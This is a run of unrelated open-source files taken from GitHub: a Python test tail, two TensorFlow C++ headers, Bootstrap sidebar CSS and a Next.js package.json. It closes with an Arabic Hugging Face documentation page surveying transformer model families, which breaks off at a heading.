                                              format)

  def runCreateKeyReferenceFromReprTest(self, format):
    """Tests that a reference specified as repr(Key) can be loaded OK."""
    self.doLookupDeserialisationReferenceTest(self.SERIALIZED_WITH_KEY_REPR,
                                              format)

  def runCreateModelKeyFromListTest(self, format):
    """Tests that a model key specified as a list can be loaded OK."""
    self.doModelKeyDeserialisationReferenceTest(self.MK_SERIALIZED_WITH_LIST,
                                                format)

  def runCreateModelKeyFromReprTest(self, format):
    """Tests that a model key specified as a repr(Key) can be loaded OK."""
    self.doModelKeyDeserialisationReferenceTest(
        self.MK_SERIALIZED_WITH_KEY_REPR, format)

  def runCreateModelKeyFromTextTest(self, format):
    """Tests that a reference specified as a plain key_name loads OK."""
    self.doModelKeyDeserialisationReferenceTest(
        self.MK_SERIALIZED_WITH_KEY_AS_TEXT, format)

  def runDateTimeTest(self, format):
    """Tests that db.DateTimeProperty and related can be correctly handled."""
    obj = ModelC()
    obj.put()
    self.doSerialisationTest(format, obj)
# Allow running this test module directly.
if __name__ == '__main__':
  unittest.main()
/* Copyright 2016 The TensorFlow Authors. All Rights Reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
==============================================================================*/
#ifndef TENSORFLOW_CORE_LIB_STRINGS_PROTO_TEXT_UTIL_H_
#define TENSORFLOW_CORE_LIB_STRINGS_PROTO_TEXT_UTIL_H_
#include <cstddef>
#include <string>
#include "absl/strings/escaping.h"
#include "absl/strings/str_cat.h"
#include "absl/strings/string_view.h"
#include "tensorflow/core/platform/numbers.h"
#include "tensorflow/core/platform/scanner.h"
namespace tensorflow {
namespace strings {
static constexpr char kColonSeparator[] = ": ";
// Helper functions for writing proto-text output.
// Used by the code generated from tools/proto_text/gen_proto_text_lib.cc.
// Accumulates proto-text output incrementally. The generated proto-text code
// drives it with Open/Close/Append calls while walking a message; the exact
// bytes appended must match proto's DebugString()/ShortDebugString().
class ProtoTextOutput {
 public:
  // Construct a ProtoTextOutput that writes to <output> If short_debug is true,
  // outputs text to match proto.ShortDebugString(); else matches
  // proto.DebugString().
  ProtoTextOutput(std::string* output, bool short_debug)
      : output_(output),
        short_debug_(short_debug),
        field_separator_(short_debug ? " " : "\n") {}

  // Writes opening of nested message and increases indent level.
  void OpenNestedMessage(const char field_name[]) {
    // level_empty_ suppresses the separator before the first field of a level.
    absl::StrAppend(output_, level_empty_ ? "" : field_separator_, indent_,
                    field_name, " {", field_separator_);
    // Indentation is only tracked in multi-line (DebugString) mode.
    if (!short_debug_) absl::StrAppend(&indent_, "  ");
    level_empty_ = true;
  }

  // Writes close of nested message and decreases indent level.
  void CloseNestedMessage() {
    if (!short_debug_) indent_.resize(indent_.size() - 2);
    absl::StrAppend(output_, level_empty_ ? "" : field_separator_, indent_,
                    "}");
    // The closed message counts as content of the enclosing level.
    level_empty_ = false;
  }

  // Print the close of the top-level message that was printed.
  void CloseTopMessage() {
    if (!short_debug_ && !level_empty_) absl::StrAppend(output_, "\n");
  }

  // Appends a numeric value, like my_field: 123
  template <typename T>
  void AppendNumeric(const char field_name[], T value) {
    AppendFieldAndValue(field_name,
                        absl::StrCat(strings::LegacyPrecision(value)));
  }

  // Appends a numeric value, like my_field: 123, but only if value != 0.
  template <typename T>
  void AppendNumericIfNotZero(const char field_name[], T value) {
    if (value != 0) AppendNumeric(field_name, value);
  }

  // Appends a bool value, either my_field: true or my_field: false.
  void AppendBool(const char field_name[], bool value) {
    AppendFieldAndValue(field_name, value ? "true" : "false");
  }

  // Appends a bool value, as my_field: true, only if value is true.
  void AppendBoolIfTrue(const char field_name[], bool value) {
    if (value) AppendBool(field_name, value);
  }

  // Appends a string value, like my_field: "abc123".
  void AppendString(const char field_name[], const std::string& value) {
    AppendFieldAndValue(field_name,
                        absl::StrCat("\"", absl::CEscape(value), "\""));
  }

  // Appends a string value, like my_field: "abc123", but only if value is not
  // empty.
  void AppendStringIfNotEmpty(const char field_name[],
                              const std::string& value) {
    if (!value.empty()) AppendString(field_name, value);
  }

  // Appends the string name of an enum, like my_field: FIRST_ENUM.
  void AppendEnumName(const char field_name[], const std::string& name) {
    AppendFieldAndValue(field_name, name);
  }

 private:
  // Emits "<separator><indent><field_name>: <value_text>"; the separator is
  // omitted for the first field at the current nesting level.
  void AppendFieldAndValue(const char field_name[],
                           absl::string_view value_text) {
    absl::StrAppend(output_, level_empty_ ? "" : field_separator_, indent_,
                    field_name, kColonSeparator, value_text);
    level_empty_ = false;
  }

  std::string* const output_;
  const bool short_debug_;
  const std::string field_separator_;
  std::string indent_;

  // False when at least one field has been output for the message at the
  // current deepest level of nesting.
  bool level_empty_ = true;

  ProtoTextOutput(const ProtoTextOutput&) = delete;
  void operator=(const ProtoTextOutput&) = delete;
};
// Consume any run of whitespace and '#' line comments from <scanner>,
// leaving it positioned at the next significant character.
inline void ProtoSpaceAndComments(Scanner* scanner) {
  while (true) {
    scanner->AnySpace();
    if (scanner->Peek() != '#') return;
    // A comment extends to the end of the line; eat up to the newline.
    while (scanner->Peek('\n') != '\n') scanner->One(Scanner::ALL);
  }
}
// Parse the next numeric value from <scanner>, returning false if parsing
// failed.
template <typename T>
bool ProtoParseNumericFromScanner(Scanner* scanner, T* value) {
  absl::string_view numeric_str;
  scanner->RestartCapture();
  if (!scanner->Many(Scanner::LETTER_DIGIT_DOT_PLUS_MINUS)
           .GetResult(nullptr, &numeric_str)) {
    return false;
  }

  // Reject more than one leading zero (optionally after '-') to match the
  // proto text-format parser; the scan stops at the first other character.
  int leading_zero = 0;
  for (const char ch : numeric_str) {
    if (ch == '0') {
      if (++leading_zero > 1) return false;
    } else if (ch != '-') {
      break;
    }
  }

  ProtoSpaceAndComments(scanner);
  return SafeStringToNumeric<T>(numeric_str, value);
}
// Parse the next boolean value from <scanner>, returning false if parsing
// failed.
bool ProtoParseBoolFromScanner(Scanner* scanner, bool* value);
// Parse the next string literal from <scanner>, returning false if parsing
// failed.
bool ProtoParseStringLiteralFromScanner(Scanner* scanner, std::string* value);
} // namespace strings
} // namespace tensorflow
#endif // TENSORFLOW_CORE_LIB_STRINGS_PROTO_TEXT_UTIL_H_ | c | github | https://github.com/tensorflow/tensorflow | tensorflow/core/lib/strings/proto_text_util.h |
/* Size Bootstrap Icons to match the surrounding 1rem text. */
.bi {
  display: inline-block;
  width: 1rem;
  height: 1rem;
}

/*
 * Sidebar
 */

@media (min-width: 768px) {
  .sidebar .offcanvas-lg {
    position: -webkit-sticky; /* Safari fallback for sticky positioning */
    position: sticky;
    top: 48px; /* keeps the sidebar below the fixed 48px navbar */
  }

  .navbar-search {
    display: block;
  }
}

.sidebar .nav-link {
  font-size: .875rem;
  font-weight: 500;
}

.sidebar .nav-link.active {
  color: #2470dc;
}

.sidebar-heading {
  font-size: .75rem;
}

/*
 * Navbar
 */

.navbar-brand {
  padding-top: .75rem;
  padding-bottom: .75rem;
  background-color: rgba(0, 0, 0, .25);
  box-shadow: inset 1px 0 0 rgba(0, 0, 0, .25);
}

.navbar .form-control {
  padding: .75rem 1rem;
}
{
"private": true,
"scripts": {
"dev": "next",
"build": "next build",
"start": "next start"
},
"dependencies": {
"next": "latest",
"react": "^18.2.0",
"react-dom": "^18.2.0",
"react-modal": "3.16.1"
}
} | json | github | https://github.com/vercel/next.js | examples/with-route-as-modal/package.json |
/* Copyright 2020 The TensorFlow Authors. All Rights Reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
==============================================================================*/
#ifndef TENSORFLOW_C_EAGER_ABSTRACT_OPERATION_H_
#define TENSORFLOW_C_EAGER_ABSTRACT_OPERATION_H_
#include <memory>
#include "absl/types/span.h"
#include "tensorflow/c/eager/abstract_tensor_handle.h"
#include "tensorflow/c/tensor_interface.h"
#include "tensorflow/core/framework/tensor_shape.h"
#include "tensorflow/core/framework/types.pb.h"
#include "tensorflow/core/platform/status.h"
namespace tensorflow {
// Abstract interface to an operation.
// This interface allows building and executing an operation in either
// tracing or immediate execution mode.
class AbstractOperation {
protected:
enum AbstractOperationKind {
kGraph,
kMlir,
kEager,
kTfrt,
kTape,
kOpHandler
};
explicit AbstractOperation(AbstractOperationKind kind) : kind_(kind) {}
virtual ~AbstractOperation() {}
public:
AbstractOperationKind getKind() const { return kind_; }
// Release any underlying resources, including the interface object.
//
// WARNING: The destructor of this class is marked as protected to disallow
// clients from directly destroying this object since it may manage it's own
// lifetime through ref counting. Thus this must be allocated on the heap and
// clients MUST call Release() in order to destroy an instance of this class.
virtual void Release() = 0;
virtual absl::Status Reset(const char* op, const char* raw_device_name) = 0;
virtual const string& Name() const = 0;
// Returns the operation's device name.
//
// The value returned may be different from the one set by SetDeviceName, but
// it will be compatible with it: the name will be updated by device placement
// logic to refer to the specific device chosen.
//
// Example: If one calls `op->SetDeviceName("/device:GPU")`, the value
// returned by DeviceName should be "/device:GPU:*" until a particular GPU is
// chosen for the operation by the device placement logic in the
// executor. After that, the value returned by DeviceName will be a full
// device name such as "/job:localhost/replica:0/task:0/device:GPU:1".
virtual const string& DeviceName() const = 0;
// Sets the operation device name.
//
// The given `name` must be parseable by DeviceNameUtils::ParseFullName, and
// the result will be used as a constraint for device placement. See the
// documentation for DeviceName for more details.
//
// The value will override the previous value - that is, no "merging" of
// existing and given constraints will be performed.
virtual absl::Status SetDeviceName(const char* name) = 0;
virtual absl::Status AddInput(AbstractTensorHandle* input) = 0;
virtual absl::Status AddInputList(
absl::Span<AbstractTensorHandle* const> inputs) = 0;
virtual absl::Status Execute(absl::Span<AbstractTensorHandle*> retvals,
int* num_retvals) = 0;
virtual absl::Status SetAttrString(const char* attr_name, const char* data,
size_t length) = 0;
virtual absl::Status SetAttrInt(const char* attr_name, int64_t value) = 0;
virtual absl::Status SetAttrFloat(const char* attr_name, float value) = 0;
virtual absl::Status SetAttrBool(const char* attr_name, bool value) = 0;
virtual absl::Status SetAttrType(const char* attr_name, DataType value) = 0;
virtual absl::Status SetAttrShape(const char* attr_name, const int64_t* dims,
const int num_dims) = 0;
virtual absl::Status SetAttrShape(const char* attr_name,
const PartialTensorShape shape);
virtual absl::Status SetAttrFunction(const char* attr_name,
const AbstractOperation* value) = 0;
virtual absl::Status SetAttrFunctionName(const char* attr_name,
const char* value,
size_t length) = 0;
virtual absl::Status SetAttrTensor(const char* attr_name,
AbstractTensorInterface* tensor) = 0;
virtual absl::Status SetAttrStringList(const char* attr_name,
const void* const* values,
const size_t* lengths,
int num_values) = 0;
virtual absl::Status SetAttrStringList(const char* attr_name,
absl::Span<string const> values);
virtual absl::Status SetAttrFloatList(const char* attr_name,
const float* values,
int num_values) = 0;
virtual absl::Status SetAttrIntList(const char* attr_name,
const int64_t* values,
int num_values) = 0;
virtual absl::Status SetAttrTypeList(const char* attr_name,
const DataType* values,
int num_values) = 0;
virtual absl::Status SetAttrBoolList(const char* attr_name,
const unsigned char* values,
int num_values) = 0;
virtual absl::Status SetAttrShapeList(const char* attr_name,
const int64_t** dims,
const int* num_dims,
int num_values) = 0;
virtual absl::Status SetAttrFunctionList(
const char* attr_name, absl::Span<const AbstractOperation*> values) = 0;
private:
const AbstractOperationKind kind_;
};
// TODO(b/193656009): Defining these in a cc file causes linker errors with
// fastbuild.
inline absl::Status AbstractOperation::SetAttrShape(
const char* attr_name, const PartialTensorShape shape) {
return SetAttrShape(attr_name, shape.dim_sizes().data(), shape.dims());
}
inline absl::Status AbstractOperation::SetAttrStringList(
const char* attr_name, absl::Span<string const> values) {
std::vector<const char*> raw_strs;
std::vector<size_t> lengths;
raw_strs.reserve(values.size());
lengths.reserve(values.size());
for (const auto& s : values) {
raw_strs.emplace_back(s.data());
lengths.emplace_back(s.size());
}
return SetAttrStringList(attr_name,
reinterpret_cast<const void**>(raw_strs.data()),
lengths.data(), values.size());
}
namespace internal {
struct AbstractOperationDeleter {
void operator()(AbstractOperation* p) const {
if (p != nullptr) {
p->Release();
}
}
};
} // namespace internal
using AbstractOperationPtr =
std::unique_ptr<AbstractOperation, internal::AbstractOperationDeleter>;
} // namespace tensorflow
#endif // TENSORFLOW_C_EAGER_ABSTRACT_OPERATION_H_ | c | github | https://github.com/tensorflow/tensorflow | tensorflow/c/eager/abstract_operation.h |
# عائلة نماذج المحول
منذ إطلاقه في عام 2017، ألهم نموذج [المحول الأصلي](https://huggingface.co/papers/1706.03762) (راجع مدونة [المحول المشروح](http://nlp.seas.harvard.edu/2018/04/03/attention.html) لمقدمة تقنية مبسطة)، ألهم العديد من النماذج الجديدة والمبتكرة التي تتجاوز مهام معالجة اللغات الطبيعية (NLP). هناك نماذج للتنبؤ [بالبنية البروتينات المطوية](https://huggingface.co/blog/deep-learning-with-proteins)، و[تدريب على اتخاذ القرار](https://huggingface.co/blog/train-decision-transformers)، و[التنبؤ بالسلاسل الزمنية](https://huggingface.co/blog/time-series-transformers). مع وجود العديد من متغيرات المحول المتاحة، قد يكون من السهل أن تفوتك الصورة الأكبر. ما تشترك فيه جميع هذه النماذج هو أنها تستند إلى بنية المحول الأصلية. تستخدم بعض النماذج فقط الترميز أو فك الترميز، بينما تستخدم نماذج أخرى كليهما. يوفر هذا تصنيفًا مفيدًا لتصنيف واستعراض الفروقات الرئيسية بين نماذج عائلة المحولات، وسيساعدك على فهم النماذج التي لم تصادفها من قبل.
إذا لم تكن على دراية بنموذج المحول الأصلي أو تحتاج إلى تذكير، فراجع الفصل الخاص بـ [كيف تعمل المحولات](https://huggingface.co/course/chapter1/4؟fw=pt) من دورة Hugging Face.
<div align="center">
<iframe width="560" height="315" src="https://www.youtube.com/embed/H39Z_720T5s" title="مشغل فيديو YouTube" frameborder="0" allow="accelerometer؛ تشغيل تلقائي؛ قائمة تشغيل مدمجة؛ محسّنات الفيديو؛ ميزة الإشارات المرجعية" allowfullscreen></iframe>
</div>
## رؤية الحاسب (Computer vision)
<iframe style="border: 1px solid rgba(0, 0, 0, 0.1);" width="1000" height="450" src="https://www.figma.com/embed?embed_host=share&url=https%3A%2F%2Fwww.figma.com%2Ffile%2FacQBpeFBVvrDUlzFlkejoz%2FModelscape-timeline%3Fnode-id%3D0%253A1%26t%3Dm0zJ7m2BQ9oe0WtO-1" allowfullscreen></iframe>
### الشبكة التلافيفية (Convolutional network)
لطالما كانت الشبكات التلافيفية (CNNs) الطريقة السائدة لمهام رؤية الحاسب حتى برز [محول الرؤية](https://huggingface.co/papers/2010.11929) قابليته للتطوير وكفاءته العالية. وحتى بعد ذلك، لا تزال بعض أفضل صفات CNN، مثل ثبات الإزاحة، قوية جدًا (خاصة بالنسبة لمهام معينة) لدرجة أن بعض المحولات تدمج التلافيف في بنيتها. قلب [ConvNeXt](model_doc/convnext) هذا التبادل رأسًا على عقب وأدرج خيارات التصميم من المحولات لتحديث CNN. على سبيل المثال، يستخدم ConvNeXt نوافذ منزلقة غير متداخلة لتقسيم الصورة إلى رقع وزيادة حقل مجال العام الخاص بها. كما يقوم ConvNeXt بعدة خيارات مثل تصميم الطبقة لتكون أكثر كفاءة في الذاكرة وتحسين الأداء، مما يجعله منافسًا قويًا للمحولات!
### الترميز[[cv-encoder]] (Encoder)
فتح [محول الرؤية (ViT)](model_doc/vit) الباب أمام مهام رؤية الحاسب دون الاعتماد على التلافيف. يستخدم ViT ترميز محول قياسي، لكن إنجازه الرئيسي كان طريقة معالجته للصورة. فهو تقسّم الصورة إلى رقّعات ذات حجم ثابت ويستخدمها لإنشاء تضمين، تمامًا مثل تقسيم الجملة إلى رموز. استفاد ViT من بنية المُحوِّلات الفعالة لإظهار نتائج تنافسية مع CNNs في ذلك الوقت مع الحاجة إلى موارد أقل للتدريب. وسرعان ما تبع ViT نماذج رؤية أخرى يمكنها أيضًا التعامل مع مهام الرؤية الكثيفة مثل التجزئة والتعرف.
من بين هذه النماذج [Swin](model_doc/swin) Transformer. فهو يبني خرائط سمات هرمية (مثل CNN 👀 على عكس ViT) من رقّعات أصغر حجمًا ودمجها مع الرقع المجاورة في طبقات أعمق. يتم حساب الانتباه فقط ضمن نافذة محلية، ويتم تحويل النافذة بين طبقات الانتباه لإنشاء اتصالات تساعد النموذج على التعلم بشكل أفضل. نظرًا لأن محول Swin يمكنه إنتاج خرائط خصائص هرمية، فهو مرشح جيد لمهام التنبؤ الكثيفة مثل التجزئة والتعرف. كما يستخدم [SegFormer](model_doc/segformer) ترميز محول لبناء خرائط خصائص هرمية، ولكنه يضيف فك تشفير بسيط متعدد الطبقات (MLP) في الأعلى لدمج جميع خرائط الخصائص وإجراء تنبؤ.
استلهمت نماذج الرؤية الأخرى، مثل BeIT وViTMAE، الإلهام من هدف التدريب المسبق لـ BERT. يتم تدريب [BeIT](model_doc/beit) مسبقًا من خلال *نمذجة الصور المقنعة (MIM)*؛ يتم إخفاء رقّعات الصور بشكل عشوائي، كما يتم تحويل الصورة إلى رموز بصرية. يتم تدريب BeIT للتنبؤ بالرموز البصرية المُناظرة للرقع المخفية. لدى [ViTMAE](model_doc/vitmae) هدف تدريب مسبق مُماثل، باستثناء أنه يجب عليه التنبؤ بالبكسلات بدلاً من الرموز البصرية. ما هو غير عادي هو أن إخفاء 75% من رقع الصور! يقوم فك التشفير بإعادة بناء البكسلات من الرموز المخفية والرقّعات المشفرة. بعد التدريب المسبق، يتم التخلص من فك التشفير، ويصبح الترميز جاهزًا للاستخدام في مهام التالية.
### فك التشفير[[cv-decoder]] (Decoder)
نادرًا ما تستخدم نماذج الرؤية التي تعتمد على فك التشفير فقط لأن معظم نماذج الرؤية تعتمد على الترميز لتعلم تمثيل الصورة. ولكن بالنسبة للاستخدامات مثل توليد الصور، يعد فك التشفير مناسبًا بشكل طبيعي، كما رأينا من نماذج توليد النصوص مثل GPT-2. يستخدم نموذج [ImageGPT](model_doc/imagegpt) نفس بنية GPT-2، ولكنه بدلاً من التنبؤ بالرمز التالي في تسلسل، فإنه يتنبأ بالبكسل التالي في صورة. بالإضافة إلى توليد الصور، يمكن أيضًا ضبط ImageGPT بدقة لتصنيف الصور.
### الترميز وفك التشفير[[cv-encoder-decoder]] (Encoder-decoder)
تستخدم نماذج الرؤية بشكل شائع ترميزًا (يُعرف أيضًا باسم العمود الفقري) لاستخراج ميزات الصورة المهمة قبل تمريرها إلى فك التشفير لنموذج المُحوّل. يستخدم [DETR](model_doc/detr) عمودًا فقريًا مُدربًا مسبقًا، ولكنه يستخدم أيضًا الببنية الكاملة للترميز وفك تشفير لنموذج المحول للكشف عن الأشياء. يتعلم الترميز تمثيلات الصور ويجمعها مع استعلامات الكائنات (كل استعلام كائن هو تضمين مُتعلم يركز على منطقة أو كائن في صورة) في فك التشفير. يتنبأ DETR بإحداثيات مربع الحدود وتسمية الفئة لكل استعلام كائن.
## معالجة اللغات الطبيعية (Natural language processing - NLP)
<iframe style="border: 1px solid rgba(0, 0, 0, 0.1);" width="1000" height="450" src="https://www.figma.com/embed?embed_host=share&url=https%3A%2F%2Fwww.figma.com%2Ffile%2FUhbQAZDlpYW5XEpdFy6GoG%2Fnlp-model-timeline%3Fnode-id%3D0%253A1%26t%3D4mZMr4r1vDEYGJ50-1" allowfullscreen></iframe>
### الترميز اللغوي[[nlp-encoder]]
نموذج [BERT](model_doc/bert) هو محوّل (Transformer) يعتمد على الترميز فقط يقوم بشكل عشوائي بإخفاء رموز معينة في المدخلات لتجنب رؤية باقى الرموز الأخرى، مما يسمح له "بالغش". يتمثل هدف التدريب المسبق في التنبؤ بالرمز المخفي بناءً على السياق. يسمح هذا لـ BERT باستخدام السياقات اليمنى واليسرى بالكامل لمساعدته في تعلم تمثيل أعمق وأغنى للبيانات المدخلة. ومع ذلك، كان هناك مجال للتحسين في استراتيجية التدريب المسبق لـ BERT. نموذج [RoBERTa](model_doc/roberta) اضاف تحسين من خلال تقديم وصفة تدريب مسبق جديدة تشمل التدريب لفترة أطول وعلى دفعات أكبر، وإخفاء الرموز عشوائيًا في كل حقبة بدلاً من مرة واحدة فقط أثناء المعالجة المسبقة، وإزالة هدف التنبؤ بالجملة التالية.
تتمثل الاستراتيجية السائدة لتحسين الأداء في زيادة حجم النموذج. ولكن تدريب النماذج الكبيرة مكلف من الناحية الحسابية. إحدى طرق تقليل التكاليف الحسابية هي استخدام نموذج أصغر مثل [DistilBERT](model_doc/distilbert). يستخدم DistilBERT [ تقنية تقطير المعرفة](https://huggingface.co/papers/1503.02531) - وهي تقنية ضغط - لإنشاء نموذج أصغر من BERT مع الحفاظ على معظم قدراته على فهم اللغةا.
مرت معظم نماذج المحول في الاتجاه نحو المزيد من المعلمات، مما أدى إلى ظهور نماذج جديدة تركز على تحسين كفاءة التدريب. يقلّل [ALBERT](model_doc/albert) من استهلاك الذاكرة عن طريق تقليل عدد المعلمات بطريقتين: فصل تضمين المفردات الأكبر إلى مصفوفتين أصغر والسماح للمستويات بمشاركة المعلمات. أضاف [DeBERTa](model_doc/deberta) آلية انتباه منفصلة حيث يتم ترميز الكلمة وموضعها بشكل منفصل في متجهين. يتم حساب الانتباه من هذه المتجهات المنفصلة بدلاً من متجه واحد يحتوي على تضمين الكلمة والموقع. ركز [Longformer](model_doc/longformer) أيضًا على جعل الانتباه أكثر كفاءة، خاصة لمعالجة المستندات ذات تسلسلات أطولل. فهو يستخدم مزيجًا من انتباه النوافذ المحلية (يتم حساب الانتباه فقط ن نافذة ذات حجم ثابت حول كل رمز) والانتباه العام (فقط لرموز مهمة محددة مثل `[CLS]` للتصنيف) لإنشاء مصفوفة انتباه متفرقة بدلاً من مصفوفة انتباه كاملة.
### فك التشفير[[nlp-decoder]]
نموذج [GPT-2](model_doc/gpt2) هو محول فك تشفير فقط يتنبأ بالكلمة التالية في التسلسل. إنه يخفي الرموز التالية الموجودة على اليمين حتى لا يتمكن النموذج من "الغش" بالنظر إليها. من خلال التدريب المسبق على كميات هائلة من النصوص، أصبح [GPT-2](model_doc/gpt2) بارعًا في توليد النصوص، حتى لو لم تكن النص دقيقًا أو صحيحًا في بعض الأحيان فقط. ولكن كان يفتقر إلى سياق لترابط المتبادل (bidirectional context) الموجود من التدريب المسبق لـ [BERT](model_doc/bert) ، مما جعله غير مناسب لمهام معينة. يجمع [XLNET](model_doc/xlnet) بين أفضل ما في أهداف التدريب المسبق لـ [BERT](model_doc/bert) و [GPT-2](model_doc/gpt2) من خلال اعتماد نهج النمذجة اللغوية باستخدام التباديل (Permutation Language Modeling - PLM) الذي يسمح له بتعلم الترابط ثنائي الاتجاه.
بعد ظهور [GPT-2](model_doc/gpt2)، تطورت النماذج اللغوية بشكل أكبر حجمًا وأكثر تعقيدًا وأصبحت تُعرف الآن باسم *نماذج اللغة الكبيرة (LLMs)*. توضح LLMs مهارات تعلم قليلة الكمية أو حتى معدومة إذا تم تدريبها على مجموعة بيانات كبيرة بما يكفي. [GPT-J](model_doc/gptj) هو LLM به 6 مليارات معلمة مدربة على 400 مليار رمز. تبعه نموذج [OPT](model_doc/opt)، وهي عائلة من نماذج فك التشفير فقط، أكبرها 175 مليار معلمة ودُرب على 180 مليار رمز. تم إصدار [BLOOM](model_doc/bloom) في نفس الوقت تقريبًا، ويحتوي أكبر نموذج في العائلة على 176 مليار معلمة ودُرب على 366 مليار رمز في 46 لغة و13 لغة برمجة.
### الترميز وفك التشفير[[nlp-encoder-decoder]]
يحتفظ [BART](model_doc/bart) ببنية المحول الأصلية، ولكنه يعدّل هدف التدريب المسبق باستخدام إفساد *إدخال النصوص*، حيث يتم استبدال بعض نطاقات النص برمز `mask` واحد. يتنبأ فك التشفير بالرموز غير الفاسدة (يتم إخفاء الرموز المستقبلية) ويستخدم حالات الترميز المخفية للمساعدة. [Pegasus](model_doc/pegasus) مشابه لـ BART، ولكن Pegasus يقوم بإخفاء جمل كاملة بدلاً من مقاطع النص. بالإضافة إلى نمذجة اللغة المقنعة، يتم تدريب Pegasus مسبقًا بواسطة توليد الجمل الفارغة (GSG). يقوم هدف GSG بإخفاء الجمل الكاملة المهمة للمستند، واستبدالها برمز `mask`. يجب على فك التشفير توليد المخرجات من الجمل المتبقية. [T5](model_doc/t5) هو نموذج فريد من نوعه يحوّل جميع مهام معالجة اللغة الطبيعية إلى مشكلة نص إلى نص باستخدام بادئات محددة. على سبيل المثال، يشير البادئة `Summarize:` إلى مهمة تلخيص. يتم تدريب T5 مسبقًا بواسطة التدريب الخاضع للإشراف (GLUE وSuperGLUE) والتدريب ذاتي الإشراف (اختيار عينة عشوائية وحذف 15% من الرموز).
## الصوت (Audio)
<iframe style="border: 1px solid rgba(0, 0, 0, 0.1);" width="1000" height="450" src="https://www.figma.com/embed?embed_host=share&url=https%3A%2F%2Fwww.figma.com%2Ffile%2Fvrchl8jDV9YwNVPWu2W0kK%2Fspeech-and-audio-model-timeline%3Fnode-id%3D0%253A1%26t%3DmM4H8pPMuK23rClL-1" allowfullscreen></iframe>
### الترميز[[audio-encoder]]
يستخدم [Wav2Vec2](model_doc/wav2vec2) ترميز من نوع المحوّل لتعلم تمثيلات الكلام بشكلٍ مباشر من موجات الصوت الخام. يتم تدريبه مسبقًا باستخدام مهمة تباينية لتحديد تمثيل الكلام الصحيح من مجموعة من التمثيلات الخاطئة. [HuBERT](model_doc/hubert) مشابه لـ Wav2Vec2 ولكنه له عملية تدريب مختلفة. يتم إنشاء تسميات الهدف عن طريق خطوة تجميع يتم فيها ت تخصيص مقاطع الصوت المتشابهة إلى مجموعات، تُصبح كل واحدة منها وحدةً خفية. ويتم تعيين الوحدة الخفية إلى تمثيل لإجراء تنبؤ.
### الترميز وفك التشفير[[audio-encoder-decoder]]
[Speech2Text](model_doc/speech_to_text) هو نموذج كلام مصمم للتعرف التلقائي على الكلام (ASR) وترجمة الكلام. يقبل النموذج ميزات بنك المرشح اللغوي التي تم استخراجها من شكل موجة الصوت وتم تدريبه مسبقًا بطريقة ذاتية التعلم لتوليد نسخة أو ترجمة. [Whisper](model_doc/whisper) هو أيضًا نموذج ASR، ولكنه على عكس العديد من نماذج الكلام الأخرى، يتم تدريبه مسبقًا على كمية كبيرة من بيانات نسخ النص الصوتي ✨ المسماة ✨ لتحقيق الأداء الصفري. يحتوي جزء كبير من مجموعة البيانات أيضًا على لغات غير اللغة الإنجليزية، مما يعني أنه يمكن استخدام Whisper أيضًا للغات منخفضة الموارد. من الناحية الهيكلية، يشبه Whisper نموذج Speech2Text. يتم تحويل إشارة الصوت إلى طيف لوجاريتم مل-ميل يتم تشفيره بواسطة الترميز. يقوم فك التشفير بتوليد النسخة بطريقة ذاتية التعلم من حالات الترميز المخفية والرموز السابقة.
## متعدد الوسائط (Multimodal)
<iframe style="border: 1px solid rgba(0, 0, 0, 0.1);" width="1000" height="450" src="https://www.figma.com/embed?embed_host=share&url=https%3A%2F%2Fwww.figma.com%2Ffile%2FcX125FQHXJS2gxeICiY93p%2Fmultimodal%3Fnode-id%3D0%253A1%26t%3DhPQwdx3HFPWJWnVf-1" allowfullscreen></iframe>
### Encoder[[mm-encoder]]
نموذج [VisualBERT](model_doc/visual_bert) هو نموذج متعدد الوسائط لمهام الرؤية اللغوية تم إصداره بعد فترة وجيزة من BERT. فهو يجمع بين BERT ونظام اكتشاف كائن مسبق التدريب لاستخراج ميزات الصورة في تضمينات بصرية، يتم تمريرها جنبًا إلى جنب مع التضمينات النصية إلى BERT. يتنبأ VisualBERT بالنص المقنع بناءً على النص غير المقنع والتضمينات المرئية، ويجب عليه أيضًا التنبؤ بما إذا كان النص متوافقًا مع الصورة. عندما تم إصدار ViT، اعتمد [ViLT](model_doc/vilt) ViT في بنيتها لأنه كان من الأسهل الحصول على تضمينات الصورة بهذه الطريقة. يتم معالجة تضمينات الصورة بشكل مشترك مع التضمينات النصية. ومن هناك، يتم التدريب المسبق لـ ViLT بواسطة مطابقة الصورة النصية، ونمذجة اللغة المقنعة، وإخفاء كلمة كاملة.
يتّبع [CLIP](model_doc/clip) نهجًا مختلفًا ويقوم بتنبؤ ثنائي من ("الصورة"، "النص"). يتم تدريب مشفر صورة (ViT) ومشفر نص (Transformer) بشكل مشترك على مجموعة بيانات مكونة من 400 مليون ثنائي من ("صورة"، "نص") لتعظيم التشابه بين متجهات ترميز الصورة ومتجهات النص ثنائي ("الصورة"، "النص"). بعد التدريب المسبق، يمكنك استخدام اللغة الطبيعية لتوجيه CLIP للتنبؤ بالنص المُعطى بناءً على صورة أو العكس بالعكس. [OWL-ViT](model_doc/owlvit) يبني على CLIP باستخدامه كعمود فقري للكشف عن الكائنات بدون إشراف. بعد التدريب المسبق، يتم إضافة رأس كشف الأجسام لإجراء تنبؤ بمجموعة مُحدّد عبر ثنائيات ("class"، "bounding box").
### Encoder-decoder[[mm-encoder-decoder]]
